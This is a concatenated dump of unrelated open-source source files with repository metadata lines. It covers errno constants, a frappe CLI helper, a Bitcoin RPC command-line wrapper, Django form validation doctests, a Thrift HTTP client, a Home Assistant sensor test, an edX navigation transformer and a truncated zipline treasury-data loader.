ENOSPC = 28 #No space left on device
ESPIPE = 29 #Illegal seek
EROFS = 30 #Read-only file system
EMLINK = 31 #Too many links
EPIPE = 32 #Broken pipe
EDOM = 33 #Numerical argument out of domain
ERANGE = 34 #Result too large
EAGAIN = 35 #Resource temporarily unavailable
EINPROGRESS = 36 #Operation now in progress
EALREADY = 37 #Operation already in progress
ENOTSOCK = 38 #Socket operation on non-socket
EDESTADDRREQ = 39 #Destination address required
EMSGSIZE = 40 #Message too long
EPROTOTYPE = 41 #Protocol wrong type for socket
ENOPROTOOPT = 42 #Protocol not available
EPROTONOSUPPORT = 43 #Protocol not supported
ESOCKTNOSUPPORT = 44 #Socket type not supported
EOPNOTSUPP = 45 #Operation not supported
EPFNOSUPPORT = 46 #Protocol family not supported
EAFNOSUPPORT = 47 #Address family not supported by protocol family
EADDRINUSE = 48 #Address already in use
EADDRNOTAVAIL = 49 #Can't assign requested address
ENETDOWN = 50 #Network is down
ENETUNREACH = 51 #Network is unreachable
ENETRESET = 52 #Network dropped connection on reset
ECONNABORTED = 53 #Software caused connection abort
ECONNRESET = 54 #Connection reset by peer
ENOBUFS = 55 #No buffer space available
EISCONN = 56 #Socket is already connected
ENOTCONN = 57 #Socket is not connected
ESHUTDOWN = 58 #Can't send after socket shutdown
ETOOMANYREFS = 59 #Too many references: can't splice
ETIMEDOUT = 60 #Operation timed out
ECONNREFUSED = 61 #Connection refused
ELOOP = 62 #Too many levels of symbolic links
ENAMETOOLONG = 63 #File name too long
EHOSTDOWN = 64 #Host is down
EHOSTUNREACH = 65 #No route to host
ENOTEMPTY = 66 #Directory not empty
ELOOK = 67 #Internal mapping for kOTLookErr, don't return to client
ENOLCK = 77 #No locks available
ENOSYS = 78 #Function not implemented
EILSEQ = 88 #Wide character encoding error
EUNKNOWN = 99 #Unknown error
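# ---------------------------------------------------------------------------
# Editor's sketch (not part of the original Apple headers): a reverse lookup
# from a numeric error code to its symbolic name can be built over this
# module's integer constants. The import name `macerrors` and the helper name
# `describe` are assumptions for illustration only; where several names share
# a value, the last definition wins.
#
#   import macerrors
#
#   _NAMES = dict((value, name) for name, value in vars(macerrors).items()
#                 if isinstance(value, int) and not name.startswith('_'))
#
#   def describe(err):
#       # Return the symbolic constant name for a numeric error code.
#       return _NAMES.get(err, 'unknown error %d' % err)
#
#   describe(-43)   # -> 'fnfErr' (File not found)
# ---------------------------------------------------------------------------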
| bsd-2-clause | -3,738,332,965,554,184,000 | 61.822294 | 161 | 0.751734 | false |
yashodhank/frappe | frappe/commands/__init__.py | 10 | 1452 | # Copyright (c) 2015, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals, absolute_import
import sys
import click
import cProfile
import StringIO
import pstats
import frappe
import frappe.utils
from functools import wraps
click.disable_unicode_literals_warning = True
def pass_context(f):
@wraps(f)
def _func(ctx, *args, **kwargs):
profile = ctx.obj['profile']
if profile:
pr = cProfile.Profile()
pr.enable()
ret = f(frappe._dict(ctx.obj), *args, **kwargs)
if profile:
pr.disable()
s = StringIO.StringIO()
ps = pstats.Stats(pr, stream=s)\
.sort_stats('cumtime', 'tottime', 'ncalls')
ps.print_stats()
print s.getvalue()
return ret
return click.pass_context(_func)
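# Editor's sketch of how a command consumes this decorator: the wrapped
# function receives frappe._dict(ctx.obj) as its first argument. The command
# name and option below are illustrative assumptions, not part of this module.
#
#   @click.command('ping')
#   @click.option('--site')
#   @pass_context
#   def ping(context, site=None):
#       print 'pong from', site or get_site(context)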
def get_site(context):
try:
site = context.sites[0]
return site
except (IndexError, TypeError):
print 'Please specify --site sitename'
sys.exit(1)
def call_command(cmd, context):
return click.Context(cmd, obj=context).forward(cmd)
def get_commands():
# prevent circular imports
from .docs import commands as doc_commands
from .scheduler import commands as scheduler_commands
from .site import commands as site_commands
from .translate import commands as translate_commands
from .utils import commands as utils_commands
return list(set(doc_commands + scheduler_commands + site_commands + translate_commands + utils_commands))
commands = get_commands()
| mit | 8,636,933,234,607,513,000 | 23.610169 | 106 | 0.730028 | false |
erwinsanchez/bitcoinwithkeccak | contrib/bitrpc/bitrpc.py | 84 | 9663 | from jsonrpc import ServiceProxy
import sys
import string
import getpass
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:8332")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:8332")
if len(sys.argv) < 2:
    print "Usage: python bitrpc.py <command>"
    sys.exit(1)

cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "encryptwallet":
try:
pwd = getpass.getpass(prompt="Enter passphrase: ")
pwd2 = getpass.getpass(prompt="Repeat passphrase: ")
if pwd == pwd2:
access.encryptwallet(pwd)
print "\n---Wallet encrypted. Server stopping, restart to run with encrypted wallet---\n"
else:
print "\n---Passphrases do not match---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Bitcoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a Bitcoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
print access.gettransaction(data)
except:
print access.gettransaction()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
                print access.sendtoaddress(to, amt, comment, commentto)
            except:
                print access.sendtoaddress(to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
            gen = raw_input("Generate? (true/false): ")
            cpus = raw_input("Max processors/cores (-1 for unlimited, optional): ")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = getpass.getpass(prompt="Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = getpass.getpass(prompt="Enter old wallet passphrase: ")
pwd2 = getpass.getpass(prompt="Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
            print "\n---Passphrase changed---\n"
        except:
            print "\n---An error occurred---\n"
else:
print "Command not found or not supported"
| mit | -2,079,752,377,804,305,700 | 27.673591 | 101 | 0.568457 | false |
titasakgm/brc-stock | openerp/addons/report_geraldo/lib/geraldo/site/newsite/django_1_0/tests/regressiontests/forms/error_messages.py | 13 | 10396 | # -*- coding: utf-8 -*-
tests = r"""
>>> from django.forms import *
>>> from django.core.files.uploadedfile import SimpleUploadedFile
# CharField ###################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['min_length'] = 'LENGTH %(length)s, MIN LENGTH %(min)s'
>>> e['max_length'] = 'LENGTH %(length)s, MAX LENGTH %(max)s'
>>> f = CharField(min_length=5, max_length=10, error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('1234')
Traceback (most recent call last):
...
ValidationError: [u'LENGTH 4, MIN LENGTH 5']
>>> f.clean('12345678901')
Traceback (most recent call last):
...
ValidationError: [u'LENGTH 11, MAX LENGTH 10']
# IntegerField ################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> e['min_value'] = 'MIN VALUE IS %s'
>>> e['max_value'] = 'MAX VALUE IS %s'
>>> f = IntegerField(min_value=5, max_value=10, error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abc')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
>>> f.clean('4')
Traceback (most recent call last):
...
ValidationError: [u'MIN VALUE IS 5']
>>> f.clean('11')
Traceback (most recent call last):
...
ValidationError: [u'MAX VALUE IS 10']
# FloatField ##################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> e['min_value'] = 'MIN VALUE IS %s'
>>> e['max_value'] = 'MAX VALUE IS %s'
>>> f = FloatField(min_value=5, max_value=10, error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abc')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
>>> f.clean('4')
Traceback (most recent call last):
...
ValidationError: [u'MIN VALUE IS 5']
>>> f.clean('11')
Traceback (most recent call last):
...
ValidationError: [u'MAX VALUE IS 10']
# DecimalField ################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> e['min_value'] = 'MIN VALUE IS %s'
>>> e['max_value'] = 'MAX VALUE IS %s'
>>> e['max_digits'] = 'MAX DIGITS IS %s'
>>> e['max_decimal_places'] = 'MAX DP IS %s'
>>> e['max_whole_digits'] = 'MAX DIGITS BEFORE DP IS %s'
>>> f = DecimalField(min_value=5, max_value=10, error_messages=e)
>>> f2 = DecimalField(max_digits=4, decimal_places=2, error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abc')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
>>> f.clean('4')
Traceback (most recent call last):
...
ValidationError: [u'MIN VALUE IS 5']
>>> f.clean('11')
Traceback (most recent call last):
...
ValidationError: [u'MAX VALUE IS 10']
>>> f2.clean('123.45')
Traceback (most recent call last):
...
ValidationError: [u'MAX DIGITS IS 4']
>>> f2.clean('1.234')
Traceback (most recent call last):
...
ValidationError: [u'MAX DP IS 2']
>>> f2.clean('123.4')
Traceback (most recent call last):
...
ValidationError: [u'MAX DIGITS BEFORE DP IS 2']
# DateField ###################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> f = DateField(error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abc')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
# TimeField ###################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> f = TimeField(error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abc')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
# DateTimeField ###############################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> f = DateTimeField(error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abc')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
# RegexField ##################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> e['min_length'] = 'LENGTH %(length)s, MIN LENGTH %(min)s'
>>> e['max_length'] = 'LENGTH %(length)s, MAX LENGTH %(max)s'
>>> f = RegexField(r'^\d+$', min_length=5, max_length=10, error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abcde')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
>>> f.clean('1234')
Traceback (most recent call last):
...
ValidationError: [u'LENGTH 4, MIN LENGTH 5']
>>> f.clean('12345678901')
Traceback (most recent call last):
...
ValidationError: [u'LENGTH 11, MAX LENGTH 10']
# EmailField ##################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> e['min_length'] = 'LENGTH %(length)s, MIN LENGTH %(min)s'
>>> e['max_length'] = 'LENGTH %(length)s, MAX LENGTH %(max)s'
>>> f = EmailField(min_length=8, max_length=10, error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abcdefgh')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
>>> f.clean('[email protected]')
Traceback (most recent call last):
...
ValidationError: [u'LENGTH 7, MIN LENGTH 8']
>>> f.clean('[email protected]')
Traceback (most recent call last):
...
ValidationError: [u'LENGTH 11, MAX LENGTH 10']
# FileField ##################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> e['missing'] = 'MISSING'
>>> e['empty'] = 'EMPTY FILE'
>>> f = FileField(error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abc')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
>>> f.clean(SimpleUploadedFile('name', None))
Traceback (most recent call last):
...
ValidationError: [u'EMPTY FILE']
>>> f.clean(SimpleUploadedFile('name', ''))
Traceback (most recent call last):
...
ValidationError: [u'EMPTY FILE']
# URLField ##################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> e['invalid_link'] = 'INVALID LINK'
>>> f = URLField(verify_exists=True, error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abc.c')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
>>> f.clean('http://www.broken.djangoproject.com')
Traceback (most recent call last):
...
ValidationError: [u'INVALID LINK']
# BooleanField ################################################################
>>> e = {'required': 'REQUIRED'}
>>> f = BooleanField(error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
# ChoiceField #################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid_choice'] = '%(value)s IS INVALID CHOICE'
>>> f = ChoiceField(choices=[('a', 'aye')], error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('b')
Traceback (most recent call last):
...
ValidationError: [u'b IS INVALID CHOICE']
# MultipleChoiceField #########################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid_choice'] = '%(value)s IS INVALID CHOICE'
>>> e['invalid_list'] = 'NOT A LIST'
>>> f = MultipleChoiceField(choices=[('a', 'aye')], error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('b')
Traceback (most recent call last):
...
ValidationError: [u'NOT A LIST']
>>> f.clean(['b'])
Traceback (most recent call last):
...
ValidationError: [u'b IS INVALID CHOICE']
# SplitDateTimeField ##########################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid_date'] = 'INVALID DATE'
>>> e['invalid_time'] = 'INVALID TIME'
>>> f = SplitDateTimeField(error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean(['a', 'b'])
Traceback (most recent call last):
...
ValidationError: [u'INVALID DATE', u'INVALID TIME']
# IPAddressField ##############################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID IP ADDRESS'
>>> f = IPAddressField(error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('127.0.0')
Traceback (most recent call last):
...
ValidationError: [u'INVALID IP ADDRESS']
###############################################################################
# Create choices for the model choice field tests below.
>>> from regressiontests.forms.models import ChoiceModel
>>> ChoiceModel.objects.create(pk=1, name='a')
<ChoiceModel: ChoiceModel object>
>>> ChoiceModel.objects.create(pk=2, name='b')
<ChoiceModel: ChoiceModel object>
>>> ChoiceModel.objects.create(pk=3, name='c')
<ChoiceModel: ChoiceModel object>
# ModelChoiceField ############################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid_choice'] = 'INVALID CHOICE'
>>> f = ModelChoiceField(queryset=ChoiceModel.objects.all(), error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('4')
Traceback (most recent call last):
...
ValidationError: [u'INVALID CHOICE']
# ModelMultipleChoiceField ####################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid_choice'] = '%s IS INVALID CHOICE'
>>> e['list'] = 'NOT A LIST OF VALUES'
>>> f = ModelMultipleChoiceField(queryset=ChoiceModel.objects.all(), error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('3')
Traceback (most recent call last):
...
ValidationError: [u'NOT A LIST OF VALUES']
>>> f.clean(['4'])
Traceback (most recent call last):
...
ValidationError: [u'4 IS INVALID CHOICE']
"""
| agpl-3.0 | 9,170,946,586,135,136,000 | 27.797784 | 86 | 0.571951 | false |
theyaa/Impala | thirdparty/hive-1.1.0-cdh5.7.0-SNAPSHOT/lib/py/thrift/transport/THttpClient.py | 71 | 2916 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from TTransport import *
from cStringIO import StringIO
import urlparse
import httplib
import warnings
class THttpClient(TTransportBase):
"""Http implementation of TTransport base."""
def __init__(self, uri_or_host, port=None, path=None):
"""THttpClient supports two different types constructor parameters.
THttpClient(host, port, path) - deprecated
THttpClient(uri)
Only the second supports https."""
if port is not None:
warnings.warn("Please use the THttpClient('http://host:port/path') syntax", DeprecationWarning, stacklevel=2)
self.host = uri_or_host
self.port = port
assert path
self.path = path
self.scheme = 'http'
else:
parsed = urlparse.urlparse(uri_or_host)
self.scheme = parsed.scheme
assert self.scheme in ('http', 'https')
if self.scheme == 'http':
self.port = parsed.port or httplib.HTTP_PORT
elif self.scheme == 'https':
self.port = parsed.port or httplib.HTTPS_PORT
self.host = parsed.hostname
self.path = parsed.path
self.__wbuf = StringIO()
self.__http = None
def open(self):
if self.scheme == 'http':
self.__http = httplib.HTTP(self.host, self.port)
else:
self.__http = httplib.HTTPS(self.host, self.port)
def close(self):
self.__http.close()
self.__http = None
def isOpen(self):
    return self.__http is not None
def read(self, sz):
return self.__http.file.read(sz)
def write(self, buf):
self.__wbuf.write(buf)
def flush(self):
if self.isOpen():
self.close()
    self.open()
# Pull data out of buffer
data = self.__wbuf.getvalue()
self.__wbuf = StringIO()
# HTTP request
self.__http.putrequest('POST', self.path)
# Write headers
self.__http.putheader('Host', self.host)
self.__http.putheader('Content-Type', 'application/x-thrift')
self.__http.putheader('Content-Length', str(len(data)))
self.__http.endheaders()
# Write payload
self.__http.send(data)
# Get reply to flush the request
self.code, self.message, self.headers = self.__http.getreply()
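# Minimal usage sketch (illustrative; `Calculator` stands in for any
# Thrift-generated service client and is an assumption, not part of this
# module):
#
#   from thrift.protocol import TBinaryProtocol
#   transport = THttpClient('http://localhost:9090/calc')
#   protocol = TBinaryProtocol.TBinaryProtocol(transport)
#   client = Calculator.Client(protocol)
#   transport.open()
#   client.ping()
#   transport.close()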
| apache-2.0 | 8,663,821,783,919,870,000 | 28.16 | 115 | 0.674897 | false |
eagleamon/home-assistant | tests/components/sensor/test_random.py | 17 | 1067 | """The test for the random number sensor platform."""
import unittest
from homeassistant.bootstrap import setup_component
from tests.common import get_test_home_assistant
class TestRandomSensor(unittest.TestCase):
"""Test the Random number sensor."""
def setup_method(self, method):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
def teardown_method(self, method):
"""Stop everything that was started."""
self.hass.stop()
def test_random_sensor(self):
"""Test the Randowm number sensor."""
config = {
'sensor': {
'platform': 'random',
'name': 'test',
'minimum': 10,
'maximum': 20,
}
}
assert setup_component(self.hass, 'sensor', config)
state = self.hass.states.get('sensor.test')
self.assertLessEqual(int(state.state), config['sensor']['maximum'])
self.assertGreaterEqual(int(state.state), config['sensor']['minimum'])
| apache-2.0 | -48,266,713,751,136,370 | 28.638889 | 78 | 0.596064 | false |
analyseuc3m/ANALYSE-v1 | lms/djangoapps/course_api/blocks/transformers/navigation.py | 35 | 3103 | """
TODO
"""
from openedx.core.lib.block_structure.transformer import BlockStructureTransformer
from .block_depth import BlockDepthTransformer
class DescendantList(object):
    """
    Container for the serialized usage keys of a block's descendants.
    """
def __init__(self):
self.items = []
class BlockNavigationTransformer(BlockStructureTransformer):
"""
Creates a table of contents for the course.
Prerequisites: BlockDepthTransformer must be run before this in the
transform phase.
"""
VERSION = 1
BLOCK_NAVIGATION = 'block_nav'
BLOCK_NAVIGATION_FOR_CHILDREN = 'children_block_nav'
def __init__(self, nav_depth):
self.nav_depth = nav_depth
@classmethod
def name(cls):
return "blocks_api:block_navigation"
@classmethod
def collect(cls, block_structure):
"""
Collects any information that's necessary to execute this transformer's
transform method.
"""
# collect basic xblock fields
block_structure.request_xblock_fields('hide_from_toc')
def transform(self, usage_info, block_structure):
"""
Mutates block_structure based on the given usage_info.
"""
if self.nav_depth is None:
return
for block_key in block_structure.topological_traversal():
parents = block_structure.get_parents(block_key)
parents_descendants_list = set()
for parent_key in parents:
parent_nav = block_structure.get_transformer_block_field(
parent_key,
self,
self.BLOCK_NAVIGATION_FOR_CHILDREN,
)
if parent_nav is not None:
parents_descendants_list |= parent_nav
children_descendants_list = None
if (
not block_structure.get_xblock_field(block_key, 'hide_from_toc', False) and (
not parents or
any(parent_desc_list is not None for parent_desc_list in parents_descendants_list)
)
):
# add self to parent's descendants
for parent_desc_list in parents_descendants_list:
if parent_desc_list is not None:
parent_desc_list.items.append(unicode(block_key))
if BlockDepthTransformer.get_block_depth(block_structure, block_key) > self.nav_depth:
children_descendants_list = parents_descendants_list
else:
block_nav_list = DescendantList()
children_descendants_list = {block_nav_list}
block_structure.set_transformer_block_field(
block_key,
self,
self.BLOCK_NAVIGATION,
block_nav_list.items
)
block_structure.set_transformer_block_field(
block_key,
self,
self.BLOCK_NAVIGATION_FOR_CHILDREN,
children_descendants_list
)
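# Usage sketch (illustrative; the real pipeline lives in the block structure
# framework, which runs collect() once per course and transform() per request,
# so constructor arguments here are assumptions):
#
#   transformers = [BlockDepthTransformer(nav_depth),
#                   BlockNavigationTransformer(nav_depth)]
#   for transformer in transformers:
#       transformer.transform(usage_info, block_structure)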
| agpl-3.0 | -1,662,347,706,085,102,600 | 32.728261 | 106 | 0.557525 | false |
DVegaCapital/zipline | zipline/data/treasuries_can.py | 32 | 4188 | #
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import requests
from . loader_utils import (
source_to_records
)
from zipline.data.treasuries import (
treasury_mappings, get_treasury_date, get_treasury_rate
)
_CURVE_MAPPINGS = {
'date': (get_treasury_date, "Date"),
'1month': (get_treasury_rate, "V39063"),
'3month': (get_treasury_rate, "V39065"),
'6month': (get_treasury_rate, "V39066"),
'1year': (get_treasury_rate, "V39067"),
'2year': (get_treasury_rate, "V39051"),
'3year': (get_treasury_rate, "V39052"),
'5year': (get_treasury_rate, "V39053"),
'7year': (get_treasury_rate, "V39054"),
'10year': (get_treasury_rate, "V39055"),
# Bank of Canada refers to this as 'Long' Rate, approximately 30 years.
'30year': (get_treasury_rate, "V39056"),
}
BILLS = ['V39063', 'V39065', 'V39066', 'V39067']
BONDS = ['V39051', 'V39052', 'V39053', 'V39054', 'V39055', 'V39056']
def get_treasury_source(start_date=None, end_date=None):
today = datetime.date.today()
# Bank of Canada only has 10 years of data and has this in the URL.
restriction = datetime.date(today.year - 10, today.month, today.day)
if not end_date:
end_date = today
if not start_date:
start_date = restriction
bill_url = (
"http://www.bankofcanada.ca/stats/results/csv?"
"lP=lookup_tbill_yields.php&sR={restrict}&se="
"L_V39063-L_V39065-L_V39066-L_V39067&dF={start}&dT={end}"
.format(restrict=restriction.strftime("%Y-%m-%d"),
start=start_date.strftime("%Y-%m-%d"),
end=end_date.strftime("%Y-%m-%d"),
)
)
bond_url = (
"http://www.bankofcanada.ca/stats/results/csv?"
"lP=lookup_bond_yields.php&sR={restrict}&se="
"L_V39051-L_V39052-L_V39053-L_V39054-L_V39055-L_V39056"
"&dF={start}&dT={end}"
.format(restrict=restriction.strftime("%Y-%m-%d"),
start=start_date.strftime("%Y-%m-%d"),
end=end_date.strftime("%Y-%m-%d")
)
)
res_bill = requests.get(bill_url, stream=True)
res_bond = requests.get(bond_url, stream=True)
bill_iter = res_bill.iter_lines()
bond_iter = res_bond.iter_lines()
bill_row = ""
while ",".join(BILLS) not in bill_row:
bill_row = bill_iter.next()
if 'Daily series:' in bill_row:
bill_end_date = datetime.datetime.strptime(
bill_row.split(' - ')[1].strip(),
"%Y-%m-%d").date()
bill_header = bill_row.split(",")
bond_row = ""
while ",".join(BONDS) not in bond_row:
bond_row = bond_iter.next()
if 'Daily series:' in bond_row:
